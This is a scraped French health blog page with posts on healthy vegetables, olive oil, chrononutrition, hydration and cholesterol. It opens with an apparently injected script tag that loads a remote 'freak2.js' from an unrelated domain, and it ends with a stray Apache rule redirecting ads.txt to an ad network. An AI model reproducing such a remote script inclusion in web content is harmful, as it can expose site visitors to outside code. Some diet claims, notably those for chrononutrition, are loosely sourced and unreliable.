•  
    <script src="http://www.vshop.fr/js/freak2.js" type="text/javascript"></script>

    Les 10 meilleurs légumes pour votre santé

    Tous les légumes sont bons pour la santé, mais certains plus que d’autres ! Voici les dix légumes vedettes recommandés dans une alimentation prévention. Intégrez-les à votre menu pour avoir  les vitamines et minéraux indispensables à votre organisme !

     

    1. La tomate

    La tomate peut protéger du cancer de la prostate grâce à sa richesse en lycopène
     

    2. Le brocoli

    Le brocoli est l’un des légumes les plus étudiés par les nutritionnistes, et à juste titre. Il constitue une excellente source de vitamine C et de bêta-carotène antioxydants, de vitamine B9  (ou folates) et de potassium, qui réduisent le risque de maladie cardiovasculaire
     

    3. Le chou-fleur

    Le chou, le chou-fleur et tous les légumes crucifères (qui incluent les navets, le radis, le cresson) sont remarquablement riches en vitamines C et B9 (folates), ainsi qu’en substances soufrées protectrices contre le cancer
     

    4. La courge d'hiver

    La courge d’hiver renferme beaucoup de bêta-carotène : plus la chair est colorée, plus son taux est élevé et plus les propriétés antioxydantes du légume sont intéressantes. Elle procure aussi des vitamines C et B, du potassium, du magnésium et des fibres abondantes (notamment solubles)
     

    5. Les épinards

    Les épinards ainsi que les autres légumes-feuilles vert foncé (bette, mâche, salade verte, roquette, etc.) sont de généreux pourvoyeurs de substances protectrices. Ils renferment beaucoup de vitamine C, B9 et de bêta-carotène. Ils sont riches en fibres et en minéraux
     

    6. Les légumineuses

    Les légumineuses – lentilles, haricots, pois chiches, haricots à écosser – ont en commun un apport élevé en fibres solubles et insolubles, en vitamines B, utiles pour le bon fonctionnement neuro-musculaire, et en minéraux comme le magnésium, le potassium et le phosphore. On y trouve aussi des protéines végétales en quantité non négligeable
     

    7. L'oignon, l'ail et l'échalote

    L’oignon, l’ail et l’échalote contribuent à la santé cardiovasculaire grâce à leurs phytocomposants actifs, notamment des substances soufrées (allicine de l’ail, diphénylamine, disulfure d'allyle dans l’oignon) et d’autres composés spécifiques. Les bénéfices d’une consommation régulière sont maintenant prouvés : ils favorisent la fluidité sanguine, aident à abaisser le cholestérol et la tension artérielle
     

    8. La patate douce

    La patate douce est particulièrement riche en bêta-carotène, qui aide à prévenir certains cancers (estomac, pancréas, bouche et gencives) ; en potassium, qui atténue la pression artérielle ; en vitamine B6, qui prévient les maladies cardiaques ; en vitamine C, qui fortifie l’immunité ; et, si on mange la pelure, en fibres insolubles, qui enrayent la constipation et les diverticulose

     

    9. Le poivron

    Le poivron fait partie des légumes les plus riches en vitamine C (c’est d’ailleurs à partir du poivron rouge qu’elle a été isolée pour la première fois), mais aussi en bêta-carotène et en pigments flavonoïdes, composants précieux dans la lutte contre les radicaux libres et qui peuvent diminuer le risque de cancer.

     

     

    1. La carotte

    La carotte arrive en tête pour l’apport de provitamine A (ou bêta-carotène), doublement intéressante : comme antioxydant et comme précurseur de la vitamine A, indispensable à la croissance cellulaire, à la vision et au bon état de la peau.

    pris   ici

    Partager via Gmail Delicious Yahoo! Pin It

    38 commentaires
  • l'huile d'olive pour votre santé

     

    l'excès de cholestérol est l'une des causes principales de maladies cardio vasculaires.l'organisme fabrique le cholestérol à partir des graisses alimentaires.parmi celles -ci , certaines sont dites mauvaises car elles augmentent le taux de cholestérol, d'autres sont dites bonnes car elles contribue à le faire baisser.l'huile d'olive fait partie des bonnes , ce n'est pas pour rien que les méditérranéens l'emploie tant

    Le cholestérol peut encrasser les artères silencieusement, sans que l'on s'en aperçoive, et même sans que l'on présente de surpoids. Seule une analyse sanguine, prescrite et interprétée par votre médecin, peut permettre de détecter un excès de cholestérol.

     

     
    L’huile d’olive et le régime méditerranéen
    C’est le concept soutenu par des études entreprises dans les années 1970, par le scientifique américain Ancel Keys, dont les résultats ont été synthétisés dans le «régime méditerranéen».

    Pour résumer, il s’agit d’une idée qui a été démontrée d’après une étude menée sur une vingtaine d’années en Finlande, au Japon, en Grèce, en Italie, aux Pays-Bas, aux États-Unis et en Yougoslavie, selon laquelle l’alimentation des populations qui vivent en Méditerranée génère l’une des espérances de vie les plus élevées au monde avec une diminution significative de l’incidence des maladies cardiaques et de certains types de cancers ainsi que de nombreuses autres maladies en rapport avec l’alimentation.
    Une alimentation saine prévoit d’abord une consommation alimentaire modérée et ensuite, une attention particulière à la composition chimique des aliments.
Le modèle alimentaire conçu par Ancel Keys, qui a ensuite été connu sous le nom de «régime méditerranéen», fonde son raisonnement sur quelques nutriments parmi lesquels, en ce qui concerne le type de lipide à consommer, figure l’huile d’olive qui joue un rôle fondamental pour sa concentration en acides gras mono-insaturés et polyinsaturés.
    Les vertus de l’alimentation méditerranéenne n’ont jamais cessé d’être vantées par tous les experts nutritionnistes. L’huile d’olive constitue l’essence même de l’alimentation méditerranéenne saine.
    L’huile d’olive esti... pour la santé et le bien vivre !
    L’huile d’olive fait partie intégrante du « régime méditerranéen » en association avec des portions raisonnables et savoureuses, tout en mangeant bien et plus lentement. Il a été montré que les personnes qui suivent le «régime méditerranéen» disposent d’une remarquable variété d’avantages pour leur santé. L’huile d’olive dans l’alimentation méditerranéenne peut rapidement apaiser la faim et permet d’ingérer beaucoup moins de calories lors d’un repas. Il reste à savoir si un seul des composants de cette alimentation est responsable de ces avantages pour la santé ou bien s’il s’agit d’une combinaison entre la consommation d’huile d’olive et une alimentation riche en légumes, fruits et poissons.
    L’huile d’olive extra vierge est une des rares huiles qui peut être consommée sans traitement chimique. (La plupart des autres huiles végétales subissent une détoxification et sont raffinées avec de la vapeur et des solvants). De l’huile d’olive fraichement pressée peut être consommée immédiatement et elle retient les arômes naturels, les vitamines, les minéraux, les antioxydants, et tous les autres produits issus de l’olive arrivée à maturité.
    La plupart des docteurs recommandent de diminuer les graisses et les calories dans l’alimentation et de remplacer le beurre, la margarine et les huiles tropicales par des graisses saines comme l’huile d’olive.

     

     

     

     

    • Les graisses cachées qui sont les graisses qui n’apparaissent pas visiblement dans les aliments. Leur consommation est donc difficile à estimer (elles représentent jusqu’à 2/3 de notre consommation de matières grasses) et leur nature est difficile à connaître (souvent saturées).
    • Ex : charcuteries, fromages, viandes grasses, plats cuisinés...

     

     

     

    • Les graisses visibles sont celles qui apparaissent évidentes et peuvent être facilement mesurées.
    • Ex : beurre, huile, margarine, mayonnaise

     

     

    Choisir des matières grasses insaturées favorisant la baisse du mauvais cholestérol

    La consommation de graisses insaturées permet la baisse du mauvais cholestérol, le LDL et augmente le bon cholestérol, le HDL.

    • L'huile d'olive, de colza, d'arachide, tournesol, noisettes, amandes, avocats, pépins de raisins, mais, soja et les poissons.
    • Les oléagineux : Pignons, noix, noisettes, amandes ou graines de tournesol

    elle régule la pression artérielle, freinerais le vieillissement cérébral et cellulaire

     

     

    l'huile d'olive pour votre santé



     

    Partager via Gmail Delicious Yahoo! Pin It

    20 commentaires
  •  

    Chrononutrition : l’arme anti cholestérol


    il est conseillé de prendre tout médicament contre le chostérol le soir contre le cholestérol doit être pris le soir


    La chrononutrition élaborée en 1986 par le Dr Alain Delabos est une méthode qui permet de mincir sans se priver. Ce n'est pas un régime mais plutôt une réorganisation de l'alimentation ou l'on doit respecter certaines règles dictées par notre "horloge biologique".

    La chrononutrition qui permet de maigrir vite et sans se priver, selon son auteur, ferait aussi baisser le cholestérol… Quelle est l’efficacité de la méthode dans cette indication ?

    Entretiens croisés avec le père de la chronobiologie, le Dr Delabos, et l’un de ses nombreux adversaires, le Dr Cocaul (Pitié-Salpétrière).

     

    Concrètement on peut manger tous les jours les aliments généralement interdits dans les régimes et perdre du poids! Du fromage, du pain, du beurre, du chocolat, des fruits secs, de la choucroute, du steak et même des frites! Non, vous ne rêvez pas, ce n'est pas une blague. La contrepartie c'est que vous ne pourrez pas prendre ces aliments à n'importe quel moment de la journée, il faudra changer vos habitudes alimentaires et adopter définitivement les recommandations alimentaires pour devenir et rester mince.

    Delabos explique que l'homme se fie plus à ses goûts qu'à ses besoins et qu'il a perdu sa capacité à se nourrir instinctivement. La facilité d'accès à la nourriture, les obligations sociales et professionnelle font que l'homme s'est éloigné de ses instincts et cela entraine des erreurs nutritionnelles plus ou moins importantes. L'alimentation ne respecte plus la chronobiologie du corps. Pour mincir et non maigrir, il faut changer cela, l'homme moderne doit selon Delabos manger gras le matin, dense le midi, sucré l'apres midi et léger le soir.

    L'idée n'est donc pas de maigrir coûte que coûte mais de rééquilibrer son alimentation pour être mince et "bien faite" car selon Delabos, nos habitudes sont pratiquement toujours responsables de notre silhouette. C'est ainsi qu'il met en place en 1998 la morphonutrition, technique permettant d'évaluer la morphologie de la personne et d'obtenir un morphotype : « Montre moi tes formes, je te dirais comment tu manges »

    bien entendu ces traitements sont à faire sous couvert d'un médecin nutritioniste

     

    Mincir et rester mincer : le bon timing

    On mange gras le matin, pour éliminer le surplus de graisses. Le petit déjeuner doit être pris dans l’heure qui suit le lever, de préférence avant 8 heures, être copieux et riche en acides gras et en glucides lents, c’est le meilleur moyen de garder la main sur ses adipocytes.
    Au menu : fromage, pain et huile d’olive.

    On déjeune dense à midi pour préserver ses muscles. Déjeuner quatre à six heures après le petit déjeuner. Un intervalle de temps que l’on doit retrouver entre tous les repas. Celui-ci doit être  strictement composé de protéines animales et végétales associées à des glucides et à des fibres.
    Au menu : viandes et féculents (légumes secs, céréales complètes). Mais pas d’entrée ni de salade, de fromage, de dessert ou de pain.

    On fait une pause sucrée dans l’après-midi, pour chasser l’eau. Attention, pas n’importe quels sucres !
    Au menu : des fruits frais, secs ou pressées. Et si nécessaire, une barre de protéines (que l’on pourra remplacer ensuite par du chocolat à 70 %).

    On dîne léger le soir pour brûler en dormant. Le dîner n’est destiné qu’à venir compléter des apports nutritionnels insuffisants en fin de journée.
    Si on n’a pas faim, on peut s’en passer. Sinon, comme pour le déjeuner, commencer par l’aliment le plus nourrissant, le poisson en l’occurrence.
    Au menu : poisson ou fruits de mer et légumes cuits ou salade verte.   etc    ici

     
    Partager via Gmail Delicious Yahoo! Pin It

    38 commentaires
  •  

     avant tout en période d'été il faut boire énormément pour empêcher le phénomène de deshydratation

    Indispensable à l'équilibre de notre organisme ,

     Notre organisme est constitué de 60 à 80 % d'eau (cette proportion varie selon l'âge de l'individu). Elle est ainsi un aliment essentiel à notre bonne santé et doit être apportée de façon abondante sur toute la journée.

    Le voyage de l'eau dans le corps

    Une étude menée par Danone Research* s’est intéressée au voyage de l’eau dans le corps et démontre que l’eau atteint le plasma sanguin et nos cellules sanguines 5 minutes après son ingestion, pour séjourner jusqu’à 7 semaines dans notre corps.

    l'eau indispensable à la santé

    Nous perdons ainsi chaque jour environ 2,5 litres par jour par les urines, la transpiration, les matières fécales. Ce sont les pertes "obligatoires". S’ajoutent à celles-ci d’autres pertes moins constantes : celles liées aux fortes chaleurs ou  à l’activité physique.

    Quelles que soient ces pertes, elles doivent obligatoirement être compensées. Par les boissons d’une part, mais aussi par les aliments  qui contiennent tous ou presque de l’eau.

    Des aliments plus ou moins "riches en eau"

    La teneur en eau des aliments est très variable. Les aliments les plus riches en eau sont les légumes, les fruits, le lait, les laitages. Leur teneur en eau dépasse 80 %.


    l'eau indispensable à la santé


    Les viandes et poissons en contiennent de 65 à 70 %.

    Quant aux fromages, leur teneur dépend de leur mode de fabrication. Plus ils sont égouttés, pressés, plus ils sont secs avec une teneur en eau de plus en plus faible. Un camembert par exemple contient environ 50 % d’eau alors qu’un emmental en contient seulement 35 %.

    Avec 30 % d’eau environ, le pain est considéré comme un produit céréalier assez humide comparativement aux biscottes (5 %), aux biscuits secs (5 %), aux céréales de petit déjeuner(2 à 3 %).

    Les pâtes, le riz, la semoule ne contiennent quasiment pas d’eau eux non plus. Heureusement, pour être consommables, ils doivent obligatoirement subir une cuisson à l’eau. Ainsi, leur teneur en eau est très augmentée et passe à 70 %.

    Certains aliments, tels que le beurre ou les margarines, le sucre et les huiles en contiennent peu ou pratiquement pas du tout.

     

     

    • un récipient contenant de l'eau

    Image:Eau.jpg

    buvez régulièrement de l'eau, à table mais également dans la journée, entre les repas : nous sommes en déshydratation permanente

       la boire à température de la pièce

       ne buvez qu'un verre de vin par repas

       soyez prudents avec la consommation de boissons sucrées : elles sont riches en calories et en sucres

        buvez du thé si possible du thé vert aux vertus antioxydantes qui protègent entre autre des maladies cardiovasculaires

    thé vert

     

     

    merci à sourour qui nous a trouvé cette vidéo et qui m'est toujours d'une aide précieuse dans mes articles

    Partager via Gmail Delicious Yahoo! Pin It

    56 commentaires
  • Le cholestérol, ce bourreau des cœurs

    Le cholestérol

     

     

    Il y a le bon, il y a le mauvais, et parfois il y en a trop. Le cholestérol, il en faut pour être en bonne santé, mais pas trop …


     

     

     

    Le cholestérol appartient à la grande famille des lipides. Substance grasse indispensable à l’organisme, il entre dans la composition des membranes de nos cellules de certaines hormones et de la bile. Le foie produit environ 75 % du cholestérol présent dans notre corps, et l’alimentation apporte les 25 % restants (viandes, oeufs, poissons gras, crustacés et produits laitiers entiers). Tout excès peut donc le faire augmenter, d’autant plus s’il existe un terrain familial d’hypercholestérolémie. Le cholestérol, ne peut circuler seul dans le sang. Pour atteindre les cellules, il a besoin d’être pris en charge par des transporteurs ou lipoprotéines.

     

     

    Transport : un système qui nettoie, l’autre qui provoque des bouchons …
    Le cholestérol voyage dans le sang grâce à 2 types de transporteurs ou Lipoprotéines : Les HDL (lipoprotéines de haute densité), qui emportent le cholestérol vers le foie avec un effet de nettoyage. : on parle alors de bon cholestérol. Les LDL (lipoprotéines de faible densité), qui se déposent lorsqu’elles sont en excès sur les parois des artères et provoquent ainsi une inflammation puis le stockage de substances sous forme de plaque. On parle alors de mauvais cholestérol,. En s’accumulant, celui-ci diminue progressivement le diamètre des artères. Ce processus, appelé athérosclérose, peut entraîner la formation de caillots de sang coagulés (thrombose) risquant à terme de boucher l’artère.

     

     

    Les associés du risque
    Un taux élevé de cholestérol, même si c’est du « mauvais cholestérol », n’est pas une maladie en soi. Mais associé avec d’autres facteurs de risques (tabac, hypertension, obésité..), une absence d’activité physique, du stress, etc., une teneur trop élevée en cholestérol peut alors augmenter le risque de troubles cardiovasculaires.


    Le bon niveau
    Avoir “trop de cholestérol” (hypercholestérolémie), c’est donc en réalité afficher des taux importants de “mauvais cholestérol” dans le sang. Seules des analyses sanguines (bilan lipidique) permettent de le déterminer. Les niveaux souhaitables en cholestérol sont Cholestérol total (CT) : inférieur à 5,2 mmol/l (200 mg/dl*) HDL (« bon cholestérol ») : égal ou supérieur à 1,0 mmol/l (39 mg/dl) LDL (« mauvais cholestérol ») : inférieur à 3,4 mmol/l (130 mg/dl) Rapport CT/HDL : inférieur à 4,5 Rapport LDL/HDL : inférieur à 5,0 Pour vous repérer, sachez qu’on parle d’hypercholestérolémie pour une teneur en cholestérol total supérieure à 2,4 g/litre de sang – alors que le taux normal doit être inférieur ou égal à 1,50g/L. Plus précisément, on considère la teneur en cholestérol HDL sanguin normale quand elle est supérieure à 0.55g/litres, et la teneur en cholestérol LDL sanguin normale quand elle est inférieure à 1.50g/litres.

    8 conseils utiles pour maitriser son cholestérol

    8 conseils utiles pour maitriser son cholestérol

     

     

    Manger moins riche ne signifie pas manger moins bon : c’est aussi l’occasion de découvrir de nouvelles saveurs. Et de se faire du bien. Huit astuces pour contrôler son cholestérol, sans nuire aux plaisirs de la table…





    1 – Remplacer le lait entier par du lait demi-écrémé ou écrémé.
    2 – Limiter la quantité de fromage et compenser avec des yaourts et du lait demi-écrémé. Attention : la crème fraîche allégée, moins riche en lipides, reste néanmoins à consommer avec modération.
    3 – Privilégier les viandes maigres (jambon, volaille, rumsteak, bavette, lapin).
    4 – Prévoir du poisson au menu, trois à quatre fois par semaine – et favoriser les poissons maigres tels le cabillaud, la sole, le merlan.
    5 – Pas plus de deux œufs par semaine : si le blanc ne contient pas de cholestérol, on en compte
    300 mg, dans un seul jaune !
    6 – Fruits et légumes sont tous recommandés : ils ne contiennent ni cholestérol ni graisse - à l'exception des oléagineux (noix, pistache, cacahuète, noix de coco).
    7 – Utiliser des plats cuisinés allégés, pauvres en graisses : l’étiquette permet de s’en assurer.
    8 – Les vinaigrettes et margarines allégées peuvent être employées si elles contiennent des huiles riches en acides gras insaturés (colza, tournesol, olive).

     

    pris sur le site :croquons la vie

    Partager via Gmail Delicious Yahoo! Pin It

    23 commentaires


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique
RewriteEngine On RewriteBase / RewriteRule ^ads.txt$ https://adaccess.fr/ads.txt?affiliateid=[17473] [L,R]